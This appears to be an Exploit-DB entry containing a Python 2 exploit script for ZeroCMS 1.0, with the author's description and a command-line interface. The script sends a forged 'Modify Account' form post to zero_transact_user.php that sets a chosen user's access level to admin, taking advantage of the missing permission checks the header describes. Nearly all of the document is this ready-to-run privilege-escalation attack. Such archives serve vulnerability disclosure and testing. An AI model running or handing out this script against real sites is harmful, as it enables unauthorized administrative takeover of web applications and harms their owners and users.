Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
import sys,getopt,cookielib,urllib2,urllib # ZeroCMS 1.0 # zero_transact_user.php # Impropper Form post hanling, (parameter polution) # Vendor: Another Awesome Stuff # Product web page: http://www.aas9.in/zerocms/ # author: tiago.alexand@gmail.com # Tested on: php 5.4.27 # OSVDB ID: 108025 # description # Summary: ZeroCMS is a very simple Content Management # System built using PHP and MySQL. # the script zero_transact_user.php contains a Modify Account case # where the execution context doen't have in to consideration the current user's permitions # allowing a malcious user to escalate its privileges to admin. def exploit(host,email,name,userid): access_level = 3 # default for admin url = host + '/zero_transact_user.php' #the script handles user related actions args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' } data = urllib.urlencode(args) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) response = opener.open(url,data); print response.read() def main(argv): host = '' email = '' accountname = '' userid = '' try: opts, args = getopt.getopt(argv,"hu:m:n:i:") except getopt.GetoptError: print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id' sys.exit(2) for opt, arg in opts: if opt == '-h': print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id' sys.exit() elif opt in ("-u"): host = arg elif opt in ("-m"): email = arg elif opt in ("-n"): accountname = arg elif opt in ("-i"): userid = arg exploit(host,email,accountname,userid) if __name__ == "__main__": main(sys.argv[1:])
